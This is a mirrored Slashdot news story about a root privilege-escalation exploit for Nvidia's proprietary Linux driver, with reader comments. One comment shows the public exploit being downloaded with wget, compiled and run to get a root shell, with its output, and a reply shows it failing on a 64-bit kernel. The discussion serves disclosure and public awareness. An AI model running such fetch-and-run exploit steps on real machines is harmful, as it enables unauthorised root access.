Slashdot Mirror

← Back to Stories (view on slashdot.org)

Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

Posted by Unknown on from the rms-gazes-upon-you-smugly dept.

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

5 of 180 comments (clear)

  1. Re:A view to a kill. by greg1104 · · Score: 5, Informative

    VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

  2. works here by Anonymous Coward · · Score: 5, Informative

    It's certainly legit..

    c@v:~$
    c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
    2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
    c@v:~$ mv 86747-001.bin nvid-root.c
    c@v:~$ gcc nvid-root.c -o nvid-root
    c@v:~$ ./nvid-root
    [*] IDT offset at 0xc1808000
    [*] Abusing nVidia...
    [*] CVE-2012-YYYY
    [*] 32-bits Kernel found at ofs 0
    [*] Using IDT entry: 220 (0xc18086e0)
    [*] Enhancing gate entry...
    [*] Triggering payload...
    [*] Hiding evidence...
    [*] Have root, will travel..
    sh-4.2#
    sh-4.2#

    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
    sh-4.2#

    sh-4.2# lsb_release -a
    LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
    Distributor ID: Ubuntu
    Description: Ubuntu 12.04 LTS
    Release: 12.04
    Codename: precise

    sh-4.2# uname -a
    Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
    sh-4.2#

    1. Re:works here by dmitrygr · · Score: 5, Informative

      64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

      [*] IDT offset at 0xffffffff81b60000
      [*] Abusing nVidia...
      [*] CVE-2012-YYYY
      [*] 64-bits Kernel found at ofs 0
      [*] Using IDT entry: 220 (0xffffffff81b60dc0)
      [*] Enhancing gate entry...
      [*] Triggering payload...
      [*] Hiding evidence...
      callsetroot returned fffffffffffffffe (-2)
      [*] Failed to get root.

      --
      -------
      1. Enjoy your job
      2. Make lots of money
      3. Work within the law

      Choose any two.
  3. Re:Who did he send it to at Nvidia? by nedlohs · · Score: 5, Informative

    Yeah you don't get more flimsy evidence than a working exploit.

  4. Re:Nvidia rotten to the core by Jerry+Atrick · · Score: 4, Informative

    Frankly a root exploit is one of their lesser sins.

    Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

    You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

    First the spent months claiming there was no bug.
    Then they spent months claiming they'd fixed it (they hadn't).
    Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

    Over a year of data loss for anyone that believed them.

    Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.